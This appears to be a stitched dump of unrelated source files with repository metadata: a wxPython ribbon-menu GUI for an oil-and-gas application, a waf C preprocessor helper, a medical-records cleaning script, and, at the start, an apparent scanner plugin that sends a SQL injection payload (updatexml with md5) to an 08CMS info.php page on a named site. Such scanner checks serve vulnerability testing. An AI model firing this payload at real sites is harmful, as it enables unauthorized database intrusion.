#_PlugName_ = 08CMS_sql Plugin
#_FileName_ = 08CMS_sql.py
def assign(service, arg):
if service == "08cms":
return True, arg
def audit(arg):
url = arg + "info.php?fid=1&tblprefix=cms_msession"
payload = "/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/md5(520)/**/limit/**/0,1)),1)%23"
geturl = url + payload
code, head, body, errcode, final_url = curl.curl2(geturl,cookie="umW_msid=rsLQWU")
if code == 200 and 'cf67355a3333e6e143439161adc2d82e' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('08cms', 'http://www.pxmfw.com/')[1])
| [
"[email protected]"
] | |
c0c2166d1a614fb9c14325a21fda4c3df736ef1f | 3b9338d99cf8090387418e32ca81617f072c39fb | /waflib/extras/dumbpreproc.py | bc4b2d04061ab96a7da92066adb4f81e8c95e0e8 | [] | no_license | sillsdevarchive/wsiwaf | 8ca14c286bafceb9ee6fad740b64ad7131282dc3 | 2dcddafc3602a7220acbe995df4ba85abb06b767 | refs/heads/master | 2020-12-30T17:10:21.701380 | 2017-05-12T05:12:17 | 2017-05-12T05:12:17 | 91,052,898 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
Dumb C/C++ preprocessor for finding dependencies
It will look at all include files it can find after removing the comments, so the following
will always add the dependency on both "a.h" and "b.h"::
#include "a.h"
#ifdef B
#include "b.h"
#endif
int main() {
return 0;
}
To use::
def configure(conf):
conf.load('compiler_c')
conf.load('c_dumbpreproc')
"""
import re, sys, os, string, traceback
from waflib import Logs, Build, Utils, Errors
from waflib.Logs import debug, error
from waflib.Tools import c_preproc
re_inc = re.compile(
'^[ \t]*(#|%:)[ \t]*(include)[ \t]*[<"](.*)[>"]\r*$',
re.IGNORECASE | re.MULTILINE)
def lines_includes(node):
code = node.read()
if c_preproc.use_trigraphs:
for (a, b) in c_preproc.trig_def: code = code.split(a).join(b)
code = c_preproc.re_nl.sub('', code)
code = c_preproc.re_cpp.sub(c_preproc.repl, code)
return [(m.group(2), m.group(3)) for m in re.finditer(re_inc, code)]
parser = c_preproc.c_parser
class dumb_parser(parser):
def addlines(self, node):
if node in self.nodes[:-1]:
return
self.currentnode_stack.append(node.parent)
self.lines = lines_includes(node) + [(c_preproc.POPFILE, '')] + self.lines
def start(self, node, env):
self.addlines(node)
while self.lines:
(x, y) = self.lines.pop(0)
if x == c_preproc.POPFILE:
self.currentnode_stack.pop()
continue
self.tryfind(y)
c_preproc.c_parser = dumb_parser
| [
"tnagy1024@f0382ac9-c320-0410-b3f0-b508d59f5a85"
] | tnagy1024@f0382ac9-c320-0410-b3f0-b508d59f5a85 |
987fa66a52474194186e6d244ee565863549eaf6 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/EMRryzd_2_20190507094011.py | d2f51d07e0695ada05beddc4e3e39e063c14d700 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | #-*- coding: UTF-8 -*-
#本文件用于数据清洗
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRryzd')#txt目录提取
hxjb = open(r'D:\python\EMR\hxjbml.txt',errors="ignore")#呼吸疾病目录
hxjbdic = hxjb.readlines()#读行
ryzd=[]
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrpath = os.path.basename(emrtxt)
emrpath = os.path.splitext(emrpath)[0]
line_out = []
for line in f.readlines():
line = re.sub('\n','',line)
line = re.sub(r'(.+?)肺炎','肺炎',line)#替换所有的肺炎
for hxjbc in hxjbdic:#检索每个词
hxjbc = re.sub('\n','',hxjbc)
if line.find(hxjbc) >-1:
line_out.append(line)
line_output = EMRdef.delre(line_out)
ryzd.append(line_out)
#line = '\n'.join(line_output)
#EMRdef.text_create(r'D:\DeepLearning ER\EHRryzd2','.txt' ,emrpath,line)
import orangecontrib.associate.fpgrowth as oaf
often=dict(oaf.frequent_itemsets(ryzd, .01))#生成频繁度
print(often)
rules = oaf.association_rules(often, .5) #这里设置置信度
rules = list(rules)
| [
"[email protected]"
] | |
271dad85cc99d1fa818b59459c7c0d3fb1f1bdd0 | 175d6cff12514da71aafef6b9ff48dd56a87db2d | /alveus/ribbon.py | 1c317cfa8a107f005e2676b9980a1ba3186d2250 | [
"MIT"
] | permissive | FrederikLehn/alveus | d309eea98bd36f06709c55a18f0855f38b5420a9 | 71a858d0cdd8a4bbd06a28eb35fa7a8a7bd4814b | refs/heads/main | 2023-06-26T02:29:59.236579 | 2021-07-30T11:07:17 | 2021-07-30T11:07:17 | 391,029,935 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 34,103 | py | # generic imports ------------------------------------------------------------------------------------------------------
import types
# wxPython imports -----------------------------------------------------------------------------------------------------
import wx.lib.agw.ribbon as rb
from wx.lib.agw.gradientbutton import GradientButton
from wx.lib.agw.ribbon.art import RIBBON_BAR_SHOW_PAGE_LABELS, RIBBON_BAR_SHOW_PAGE_ICONS
# Alveus imports -------------------------------------------------------------------------------------------------------
from _ids import *
import _icons as ico
from widgets.customized_menu import CustomMenuItem, CustomMenu
# ----------------------------------------------------------------------------------------------------------------------
class Ribbon(rb.RibbonBar):
def __init__(self, parent):
super().__init__(parent=parent, id=wx.ID_ANY, agwStyle=rb.RIBBON_BAR_DEFAULT_STYLE | rb.RIBBON_BAR_SHOW_PANEL_EXT_BUTTONS)
# File tab------------------------------------------------------------------------------------------------------
self.file_page = RibbonFileTab(self)
self.file_menu = RibbonFileMenu()
self.file_page.Bind(wx.EVT_BUTTON, self.OnFileTabMenu)
# Home tab------------------------------------------------------------------------------------------------------
home = rb.RibbonPage(self, wx.ID_ANY, 'Home')
window_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Window')
self.window = rb.RibbonButtonBar(window_panel)
self.window.AddHybridButton(ID_WINDOW, 'Window', ico.window_32x32.GetBitmap(), 'Add new window')
self.window.AddSimpleButton(ID_WINDOW_REFRESH, 'Refresh', ico.window_refresh_32x32.GetBitmap(), 'Refresh active window')
self.window.AddToggleButton(ID_WINDOW_PRESENT, 'Present', ico.window_32x32.GetBitmap(), 'Change to presentation mode')
generic_chart_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Generic charts')
self.generic_chart = rb.RibbonButtonBar(generic_chart_panel)
self.generic_chart.AddSimpleButton(ID_CHART_CARTESIAN, 'Cartesian', ico.cartesian_chart_32x32.GetBitmap(), 'Add new cartesian chart')
self.generic_chart.AddSimpleButton(ID_CHART_STACKED, 'Stacked', ico.stacked_chart_32x32.GetBitmap(), 'Add new stacked chart')
self.generic_chart.AddSimpleButton(ID_CHART_BAR, 'Bar', ico.bar_chart_32x32.GetBitmap(), 'Add new bar chart')
self.generic_chart.AddSimpleButton(ID_CHART_BUBBLE, 'Bubble', ico.bubble_chart_32x32.GetBitmap(), 'Add new bubble chart')
self.generic_chart.AddSimpleButton(ID_CHART_HISTOGRAM, 'Histogram', ico.histogram_chart_32x32.GetBitmap(), 'Add new histogram')
self.generic_chart.AddSimpleButton(ID_CHART_MAP, 'Map', ico.map_chart_32x32.GetBitmap(), 'Add new map')
self.generic_chart.AddSimpleButton(ID_CHART_3D, '3D', ico.threeD_chart_32x32.GetBitmap(), 'Add 3D chart')
custom_chart_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Custom charts')
self.custom_chart = rb.RibbonButtonBar(custom_chart_panel)
self.custom_chart.AddSimpleButton(ID_CHART_FIT, 'Fits', ico.fit_chart_32x32.GetBitmap(), 'Add new fit chart')
self.custom_chart.AddSimpleButton(ID_CHART_TREND, 'Trends', ico.trend_chart_32x32.GetBitmap(), 'Add new trend chart')
self.custom_chart.AddSimpleButton(ID_CHART_INCREMENT, 'Increments', ico.increment_chart_32x32.GetBitmap(), 'Add new increment chart')
self.custom_chart.AddSimpleButton(ID_CHART_PROFILES, 'Profiles', ico.profiles_chart_32x32.GetBitmap(), 'Add new profiles chart')
export_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Export')
self.export = rb.RibbonButtonBar(export_panel)
self.export.AddSimpleButton(ID_EXPORT_EXCEL, 'Export', ico.export_spreadsheet_32x32.GetBitmap(), 'Open profile export frame')
correlation_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Correlation')
self.correlation = rb.RibbonButtonBar(correlation_panel)
self.correlation.AddSimpleButton(ID_CORRELATION_ENT, 'Entity', ico.correlation_entity_32x32.GetBitmap(), 'Open entity correlation frame')
self.correlation.AddSimpleButton(ID_CORRELATION_VAR, 'Variable', ico.correlation_variable_32x32.GetBitmap(), 'Open variable correlation frame')
summary_panel = rb.RibbonPanel(home, wx.ID_ANY, 'Summary')
self.summary = rb.RibbonButtonBar(summary_panel)
self.summary.AddSimpleButton(ID_SUMMARY, 'Summary', ico.summary_32x32.GetBitmap(), 'Add new summary variable')
# Entities tab -------------------------------------------------------------------------------------------------
entities = rb.RibbonPage(self, wx.ID_ANY, 'Entities')
folder_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Folders')
self.folder = rb.RibbonButtonBar(folder_panel)
self.folder.AddSimpleButton(ID_FOLDER, 'Folder', ico.folder_closed_32x32.GetBitmap(), 'Add new folder')
portfolio_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Portfolio')
self.portfolio = rb.RibbonButtonBar(portfolio_panel)
self.portfolio.AddSimpleButton(ID_ANALOGUE, 'Analogue', ico.analogue_32x32.GetBitmap(), 'Add new analogue')
self.portfolio.AddSimpleButton(ID_TYPECURVE, 'Typecurve', ico.trend_chart_32x32.GetBitmap(), 'Add new typecurve')
self.portfolio.AddSimpleButton(ID_SCALING, 'Scaling', ico.scaling_chart_32x32.GetBitmap(), 'Add new scaling')
subsurface_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Subsurface')
self.subsurface = rb.RibbonButtonBar(subsurface_panel)
self.subsurface.AddSimpleButton(ID_RESERVOIR, 'Reservoir', ico.reservoir_32x32.GetBitmap(), 'Add new reservoir')
self.subsurface.AddSimpleButton(ID_THEME, 'Theme', ico.theme_32x32.GetBitmap(), 'Add new theme')
self.subsurface.AddSimpleButton(ID_POLYGON, 'Polygon', ico.polygon_32x32.GetBitmap(), 'Add new polygon')
self.subsurface.AddSimpleButton(ID_PRODUCER, 'Producer', ico.producer_oil_gas_32x32.GetBitmap(), 'Add new producer')
self.subsurface.AddSimpleButton(ID_INJECTOR, 'Injector', ico.injector_wag_32x32.GetBitmap(), 'Add new injector')
facility_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Facility')
self.facility = rb.RibbonButtonBar(facility_panel)
self.facility.AddSimpleButton(ID_PLATFORM, 'Platform', ico.platforms_32x32.GetBitmap(), 'Add new platform')
self.facility.AddSimpleButton(ID_PROCESSOR, 'Processor', ico.processor_32x32.GetBitmap(), 'Add new processor')
self.facility.AddSimpleButton(ID_PIPELINE, 'Pipeline', ico.pipeline_32x32.GetBitmap(), 'Add new pipeline')
concession_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Concession')
self.concession = rb.RibbonButtonBar(concession_panel)
self.concession.AddSimpleButton(ID_FIELD, 'Field', ico.field_32x32.GetBitmap(), 'Add new field')
self.concession.AddSimpleButton(ID_BLOCK, 'Block', ico.block_32x32.GetBitmap(), 'Add new block')
simulation_panel = rb.RibbonPanel(entities, wx.ID_ANY, 'Simulation')
self.simulation = rb.RibbonButtonBar(simulation_panel)
self.simulation.AddSimpleButton(ID_PROJECT, 'Project', ico.project_32x32.GetBitmap(), 'Add new project')
self.simulation.AddSimpleButton(ID_HISTORY, 'History', ico.history_match_32x32.GetBitmap(), 'Add new history')
self.simulation.AddSimpleButton(ID_SCENARIO, 'Scenario', ico.scenario_32x32.GetBitmap(), 'Add new scenario')
self.simulation.AddSimpleButton(ID_PREDICTION, 'Prediction', ico.prediction_32x32.GetBitmap(), 'Add new prediction')
self.ChangeArtProvider()
self.Realize()
# ==================================================================================================================
# Events
# ==================================================================================================================
# comes from: https://github.com/wxWidgets/wxPython/blob/master/demo/agw/FlatMenu.py (26-08-2019)
# lines: 538-561
def OnFileTabMenu(self, event):
button = event.GetEventObject()
button_size = button.GetSize()
button_pos = button.GetPosition()
button_pos = button.GetParent().ClientToScreen(button_pos)
self.file_menu.SetOwnerHeight(button_size.y)
self.file_menu.Popup(wx.Point(button_pos.x, button_pos.y), self)
# ==================================================================================================================
# External Methods
# ==================================================================================================================
def EnableButtons(self, state, entity_mgr=None):
"""
Enables or disables ribbon buttons. If state is False, all buttons are disabled, if state is True, the enabling
is based on certain criteria from the entity_mgr w.r.t. lower hierarchy entities not being enabled if no
higher level entity is available.
:param state: bool
:param entity_mgr: class EntityManager
:return:
"""
# Enable file menu
self.file_menu.save.Enable(state)
self.file_menu.save_as.Enable(state)
self.file_menu.close.Enable(state)
self.file_menu.settings.Enable(state)
# Enable ribbon
self.folder.EnableButton(ID_FOLDER, state)
self.window.EnableButton(ID_WINDOW, state)
self.window.EnableButton(ID_WINDOW_REFRESH, state)
self.window.EnableButton(ID_WINDOW_PRESENT, state)
self.generic_chart.EnableButton(ID_CHART_CARTESIAN, state)
self.generic_chart.EnableButton(ID_CHART_STACKED, state)
self.generic_chart.EnableButton(ID_CHART_BAR, state)
self.generic_chart.EnableButton(ID_CHART_BUBBLE, state)
self.generic_chart.EnableButton(ID_CHART_HISTOGRAM, state)
self.generic_chart.EnableButton(ID_CHART_MAP, state)
self.generic_chart.EnableButton(ID_CHART_3D, state)
# TODO: Once charts are created, replace false with state
self.custom_chart.EnableButton(ID_CHART_FIT, state)
self.custom_chart.EnableButton(ID_CHART_TREND, False)
self.custom_chart.EnableButton(ID_CHART_INCREMENT, False)
self.custom_chart.EnableButton(ID_CHART_PROFILES, False)
self.export.EnableButton(ID_EXPORT_EXCEL, state)
self.correlation.EnableButton(ID_CORRELATION_ENT, state)
self.correlation.EnableButton(ID_CORRELATION_VAR, state)
self.summary.EnableButton(ID_SUMMARY, state)
# Entities tab -------------------------------------------------------------------------------------------------
# analogues and typecurves
self.portfolio.EnableButton(ID_ANALOGUE, state)
self.portfolio.EnableButton(ID_SCALING, state)
if state:
if entity_mgr.GetAnalogues():
self.portfolio.EnableButton(ID_TYPECURVE, state)
else:
self.portfolio.EnableButton(ID_TYPECURVE, False)
else:
self.portfolio.EnableButton(ID_TYPECURVE, state)
# subsurface (reservoirs, themes, polygons, producers and injectors)
self.subsurface.EnableButton(ID_RESERVOIR, state)
if state:
if entity_mgr.GetReservoirs():
self.subsurface.EnableButton(ID_THEME, state)
if entity_mgr.GetThemes():
self.subsurface.EnableButton(ID_POLYGON, state)
if entity_mgr.GetPolygons():
self.subsurface.EnableButton(ID_PRODUCER, state)
self.subsurface.EnableButton(ID_INJECTOR, state)
else:
self.subsurface.EnableButton(ID_PRODUCER, False)
self.subsurface.EnableButton(ID_INJECTOR, False)
else:
self.subsurface.EnableButton(ID_POLYGON, False)
else:
self.subsurface.EnableButton(ID_THEME, False)
else:
self.subsurface.EnableButton(ID_THEME, state)
self.subsurface.EnableButton(ID_POLYGON, state)
self.subsurface.EnableButton(ID_PRODUCER, state)
self.subsurface.EnableButton(ID_INJECTOR, state)
# facilities (platforms, processors and pipelines)
self.facility.EnableButton(ID_PLATFORM, state)
self.facility.EnableButton(ID_PIPELINE, state)
if state:
if entity_mgr.GetPlatforms():
self.facility.EnableButton(ID_PROCESSOR, state)
else:
self.facility.EnableButton(ID_PROCESSOR, False)
else:
self.facility.EnableButton(ID_PROCESSOR, state)
# concessions (fields and blocks)
self.concession.EnableButton(ID_FIELD, state)
self.concession.EnableButton(ID_BLOCK, state)
# projects (projects, histories, scenarios and predictions)
self.simulation.EnableButton(ID_PROJECT, state)
if state:
if entity_mgr.GetProjects():
self.simulation.EnableButton(ID_HISTORY, state)
self.simulation.EnableButton(ID_SCENARIO, state)
if entity_mgr.GetScenarios():
self.simulation.EnableButton(ID_PREDICTION, state)
else:
self.simulation.EnableButton(ID_PREDICTION, False)
else:
self.simulation.EnableButton(ID_HISTORY, False)
self.simulation.EnableButton(ID_SCENARIO, False)
else:
self.simulation.EnableButton(ID_HISTORY, state)
self.simulation.EnableButton(ID_SCENARIO, state)
self.simulation.EnableButton(ID_PREDICTION, state)
# Based on: https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (16-07-2019)
def ChangeArtProvider(self):
art = self.GetArtProvider()
# add changes to drawing methods
art.DrawTab = types.MethodType(DrawTab, art)
art.DrawPanelBackground = types.MethodType(DrawPanelBackground, art)
art.DrawPanelBorder = types.MethodType(DrawPanelBorder, art)
art.DrawPageBackground = types.MethodType(DrawPageBackground, art)
# ==============================================================================================================
# drawing distances
# ==============================================================================================================
art._cached_tab_separator_visibility = -10.0 # valid visibilities are in range [0, 1]
art._tab_separation_size = 0
art._page_border_left = 1
art._page_border_top = 0
art._page_border_right = 0
art._page_border_bottom = 2
art._panel_x_separation_size = -1
art._panel_y_separation_size = 0
art._cached_tab_separator = wx.NullBitmap
# ==============================================================================================================
# colours
# ==============================================================================================================
# Tabs ---------------------------------------------------------------------------------------------------------
# sets the colour of tab labels (created by Andrea Gavana
# art._tab_label_colour = wx.Colour(255, 255, 255)
# Adjusted by Frederik Lehn to allow for different colour of active tab, hovered tab and passive tab
art._tab_label_colour = wx.Colour(255, 255, 255)
art._tab_active_label_colour = wx.Colour(0, 0, 0)
art._tab_hover_label_colour = wx.Colour(255, 255, 255)
# dont know
# art._tab_separator_colour = wx.Colour(255, 0, 0)
# art._tab_separator_gradient_colour = wx.Colour(200, 0, 0)
# sets the colour of the active tab
art._tab_active_background_colour = wx.Colour(255, 255, 255)
art._tab_active_background_gradient_colour = wx.Colour(230, 230, 230)
# sets colour of the hovered tab
art._tab_hover_background_top_colour = wx.Colour(100, 100, 100)
art._tab_hover_background_top_gradient_colour = wx.Colour(105, 105, 105)
art._tab_hover_background_colour = wx.Colour(105, 105, 105)
art._tab_hover_background_gradient_colour = wx.Colour(110, 110, 110)
# Sets the colour behind the tabs
art._tab_ctrl_background_brush = wx.Brush(wx.Colour(55, 55, 55))
# sets the colour of the border around the active tabs
art._tab_border_pen = wx.Pen(wx.Colour(55, 55, 55))
# Panels -------------------------------------------------------------------------------------------------------
# sets the colour of the label of the panel
art._panel_label_colour = wx.Colour(0, 0, 0)
art._panel_hover_label_colour = wx.Colour(0, 0, 0)
art._panel_minimised_label_colour = wx.Colour(0, 0, 0)
# don't know
# art._panel_active_background_colour = wx.Colour(255, 0, 0) # aux.COLOUR_DEFAULT
# art._panel_active_background_gradient_colour = wx.Colour(255, 0, 0) # aux.COLOUR_DEFAULT
# art._panel_active_background_top_colour = wx.Colour(255, 0, 0) # aux.COLOUR_DEFAULT
# art._panel_active_background_top_gradient_colour = wx.Colour(255, 0, 0) # aux.COLOUR_DEFAULT
# sets the colour of the background of the panel label
art._panel_label_background_brush = wx.Brush(wx.Colour(230, 230, 230))
art._panel_hover_label_background_brush = wx.Brush(wx.Colour(230, 230, 230))
# dont' know
# art._panel_hover_button_background_brush = wx.Brush(wx.Colour(255, 0, 0))
# sets the colour of the border around the panel
art._panel_border_pen = wx.Pen(wx.Colour(143, 143, 143))
art._panel_border_gradient_pen = wx.Pen(wx.Colour(143, 143, 143))
# Pages --------------------------------------------------------------------------------------------------------
# Sets the colour of the tab pages
art._page_background_top_colour = wx.Colour(230, 230, 230)
art._page_background_top_gradient_colour = wx.Colour(242, 242, 242)
art._page_background_colour = wx.Colour(242, 242, 242)
art._page_background_gradient_colour = wx.Colour(255, 255, 255)
# sets the colour of the background of the panels when hovering on them (not the pages)
art._page_hover_background_top_colour = art._page_background_top_colour
art._page_hover_background_top_gradient_colour = art._page_background_top_gradient_colour
art._page_hover_background_colour = art._page_background_colour
art._page_hover_background_gradient_colour = art._page_background_gradient_colour
# sets the colour of the border around the pages,
art._page_border_pen = wx.Pen(wx.Colour(83, 83, 83))
# introduced by Frederik Lehn to allow for a different coloured top border
art._page_border_top_pen = wx.Pen(wx.Colour(244, 170, 0))
# Buttons ------------------------------------------------------------------------------------------------------
# Sets the colour of the label of a button
art._button_bar_label_colour = wx.Colour(0, 0, 0)
# Sets the colour when clicking on a button
art._button_bar_active_background_top_colour = wx.Colour(255, 218, 109)
art._button_bar_active_background_top_gradient_colour = wx.Colour(255, 218, 109)
art._button_bar_active_background_colour = wx.Colour(255, 218, 109)
art._button_bar_active_background_gradient_colour = wx.Colour(255, 218, 109)
# Sets the colour when hovering on a button
art._button_bar_hover_background_top_colour = wx.Colour(255, 227, 125)
art._button_bar_hover_background_top_gradient_colour = wx.Colour(254, 233, 157)
art._button_bar_hover_background_colour = wx.Colour(254, 233, 157)
art._button_bar_hover_background_gradient_colour = wx.Colour(253, 243, 204)
# Sets the colour of the border when clicking and hovering on a button
art._button_bar_active_border_pen = wx.Pen(wx.Colour(194, 150, 61))
art._button_bar_hover_border_pen = wx.Pen(wx.Colour(242, 201, 88))
self.SetArtProvider(art)
class RibbonFileMenu(CustomMenu):
def __init__(self):
super().__init__()
self.save = CustomMenuItem(self, id=wx.ID_ANY, label='Save project', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=ico.save_32x32.GetBitmap())
self.save_as = CustomMenuItem(self, id=wx.ID_ANY, label='Save project as', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=ico.save_as_32x32.GetBitmap())
self.open = CustomMenuItem(self, id=wx.ID_ANY, label='Open project', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=ico.project_open_32x32.GetBitmap())
self.close = CustomMenuItem(self, id=wx.ID_ANY, label='Close project', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=ico.project_close_32x32.GetBitmap())
self.new = CustomMenuItem(self, id=wx.ID_ANY, label='New project', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=wx.ArtProvider.GetBitmap(wx.ART_NEW, wx.ART_OTHER, wx.Size(32, 32)))
self.settings = CustomMenuItem(self, id=wx.ID_ANY, label='Settings', helpString='', kind=wx.ITEM_NORMAL,
normalBmp=ico.settings_32x32.GetBitmap())
self.AppendItem(self.save)
self.AppendItem(self.save_as)
self.AppendSeparator()
self.AppendItem(self.open)
self.AppendItem(self.close)
self.AppendItem(self.new)
self.AppendSeparator()
self.AppendItem(self.settings)
class RibbonFileTab(GradientButton):
def __init__(self, parent):
super().__init__(parent=parent, id=wx.ID_ANY, label='File', pos=(1, 2), size=(49, 24))
self.GetPath = types.MethodType(GetPathGradientButton, self)
self.SetTopStartColour(wx.Colour(236, 201, 10))
self.SetTopEndColour(wx.Colour(250, 192, 0))
self.SetBottomStartColour(wx.Colour(250, 192, 0))
self.SetBottomEndColour(wx.Colour(244, 170, 0))
self.SetPressedTopColour(wx.Colour(244, 170, 0))
self.SetPressedBottomColour(wx.Colour(244, 170, 0))
self.SetForegroundColour(wx.Colour(0, 0, 0))
# ======================================================================================================================
# Functions used to change the ArtProvider of the ribbon
# ======================================================================================================================
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (17-07-2019)
# Changes are made to lines (in the link): 993-1007 in order to remove the curved edges at the bottom of the tabs
# Changes are made to lines (in the link): 982-991 in order to remove the curved edges at the top of the tabs
# Changes are made to lines (in the link): 1023 to have black colour for active tab and white for inactive
def DrawTab(self, dc, wnd, tab):
if tab.rect.height <= 2:
return
if tab.active or tab.hovered:
if tab.active:
background = wx.Rect(*tab.rect)
background.SetX(background.GetX() + 2)
background.SetY(background.GetY() + 2)
background.SetWidth(background.GetWidth() - 4)
background.SetHeight(background.GetHeight() - 2)
dc.GradientFillLinear(background, self._tab_active_background_colour,
self._tab_active_background_gradient_colour, wx.SOUTH)
# TODO: active and hovered
elif tab.hovered:
background = wx.Rect(*tab.rect)
background.SetX(background.GetX() + 2)
background.SetY(background.GetY() + 2)
background.SetWidth(background.GetWidth() - 4)
background.SetHeight(background.GetHeight() - 3)
h = background.GetHeight()
background.SetHeight(background.GetHeight() / 2)
dc.GradientFillLinear(background, self._tab_hover_background_top_colour,
self._tab_hover_background_top_gradient_colour, wx.SOUTH)
background.SetY(background.GetY() + background.GetHeight())
background.SetHeight(h - background.GetHeight())
dc.GradientFillLinear(background, self._tab_hover_background_colour,
self._tab_hover_background_gradient_colour, wx.SOUTH)
# Draw the outline of the tab
dc.SetPen(self._tab_border_pen)
dc.DrawLine(wx.Point(1, 1), wx.Point(3, 1))
dc.DrawLine(wx.Point(3, 1), wx.Point(3, 3))
dc.DrawLine(wx.Point(3, 3), wx.Point(1, 3))
dc.DrawLine(wx.Point(1, 3), wx.Point(1, 1))
if self._flags & RIBBON_BAR_SHOW_PAGE_ICONS:
icon = tab.page.GetIcon()
if icon.IsOk():
x = tab.rect.x + 4
if self._flags & RIBBON_BAR_SHOW_PAGE_LABELS == 0:
x = tab.rect.x + (tab.rect.width - icon.GetWidth()) / 2
dc.DrawBitmap(icon, x, tab.rect.y + 1 + (tab.rect.height - 1 - icon.GetHeight()) / 2, True)
if self._flags & RIBBON_BAR_SHOW_PAGE_LABELS:
label = tab.page.GetLabel()
if label.strip():
dc.SetFont(self._tab_label_font)
if tab.active:
dc.SetTextForeground(self._tab_active_label_colour)
elif tab.hovered:
dc.SetTextForeground(self._tab_hover_label_colour)
else:
dc.SetTextForeground(self._tab_label_colour)
dc.SetBackgroundMode(wx.TRANSPARENT)
text_width, text_height = dc.GetTextExtent(label)
width = tab.rect.width - 5
x = tab.rect.x + 3
if self._flags & RIBBON_BAR_SHOW_PAGE_ICONS:
x += 3 + tab.page.GetIcon().GetWidth()
width -= 3 + tab.page.GetIcon().GetWidth()
y = tab.rect.y + (tab.rect.height - text_height) / 2
if width <= text_width:
dc.SetClippingRegion(x, tab.rect.y, width, tab.rect.height)
dc.DrawText(label, x, y)
else:
dc.DrawText(label, x + (width - text_width) / 2 + 1, y)
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (16-07-2019)
# Changes are made to lines (in the link): 1691-1719 in order to remove wrap-around border of the panels
def DrawPanelBorder(self, dc, rect, primary_colour, secondary_colour):
dc.SetPen(primary_colour)
# draw the separating borders
#dc.DrawLine(wx.Point(1, 2), wx.Point(1, rect.height - 1))
dc.DrawLine(wx.Point(rect.width, 2), wx.Point(rect.width, rect.height - 1))
# draw the top border in the page top border colour
dc.SetPen(self._page_border_top_pen)
dc.DrawLine(wx.Point(0, 0), wx.Point(rect.width + 1, 0))
# Taken from https://github.com/wxWidgets/wxPython/blob/master/wx/lib/agw/ribbon/art_msw.py (18-07-2019)
# Changes are made to lines (in the link): 1450-1451 in order to extend panel colouring slightly to allow for a single border
# Changes are made to lines (in the link): 1480 due to an error with dc.DrawRectangleRect (changed to dc.DrawRectangle)
# notice this solution results in a slight flickering when moving the mouse between panels
def DrawPanelBackground(self, dc, wnd, rect):
self.DrawPartialPageBackground(dc, wnd, rect, False)
true_rect = wx.Rect(*rect)
true_rect = self.RemovePanelPadding(true_rect)
dc.SetFont(self._panel_label_font)
dc.SetPen(wx.TRANSPARENT_PEN)
has_ext_button = wnd.HasExtButton()
if wnd.IsHovered():
dc.SetBrush(self._panel_hover_label_background_brush)
dc.SetTextForeground(self._panel_hover_label_colour)
else:
dc.SetBrush(self._panel_label_background_brush)
dc.SetTextForeground(self._panel_label_colour)
label_rect = wx.Rect(*true_rect)
label = wnd.GetLabel().strip()
clip_label = False
label_size = wx.Size(*dc.GetTextExtent(label))
label_rect.SetX(label_rect.GetX()) # + 1
label_rect.SetWidth(label_rect.GetWidth()) # - 2
label_rect.SetHeight(label_size.GetHeight() + 2)
label_rect.SetY(true_rect.GetBottom() - label_rect.GetHeight())
label_height = label_rect.GetHeight()
label_bg_rect = wx.Rect(*label_rect)
if has_ext_button:
label_rect.SetWidth(label_rect.GetWidth() - 13)
if label_size.GetWidth() > label_rect.GetWidth():
# Test if there is enough length for 3 letters and ...
new_label = label[0:3] + "..."
label_size = wx.Size(*dc.GetTextExtent(new_label))
if label_size.GetWidth() > label_rect.GetWidth():
# Not enough room for three characters and ...
# Display the entire label and just crop it
clip_label = True
else:
# Room for some characters and ...
# Display as many characters as possible and append ...
for l in range(len(label) - 1, 3, -1):
new_label = label[0:l] + "..."
label_size = wx.Size(*dc.GetTextExtent(new_label))
if label_size.GetWidth() <= label_rect.GetWidth():
label = new_label
break
dc.DrawRectangle(label_rect)
if clip_label:
clip = wx.DCClipper(dc, label_rect)
dc.DrawText(label, label_rect.GetX(), label_rect.GetY() + (label_rect.GetHeight() - label_size.GetHeight()) / 2)
else:
dc.DrawText(label, label_rect.GetX() + (label_rect.GetWidth() - label_size.GetWidth()) / 2,
label_rect.GetY() + (label_rect.GetHeight() - label_size.GetHeight()) / 2)
if has_ext_button:
if wnd.IsExtButtonHovered():
dc.SetPen(self._panel_hover_button_border_pen)
dc.SetBrush(self._panel_hover_button_background_brush)
dc.DrawRoundedRectangle(label_rect.GetRight(), label_rect.GetBottom() - 13, 13, 13, 1)
dc.DrawBitmap(self._panel_extension_bitmap[1], label_rect.GetRight() + 3, label_rect.GetBottom() - 10, True)
else:
dc.DrawBitmap(self._panel_extension_bitmap[0], label_rect.GetRight() + 3, label_rect.GetBottom() - 10, True)
if wnd.IsHovered():
client_rect = wx.Rect(*true_rect)
client_rect.SetX(client_rect.GetX() + 1)
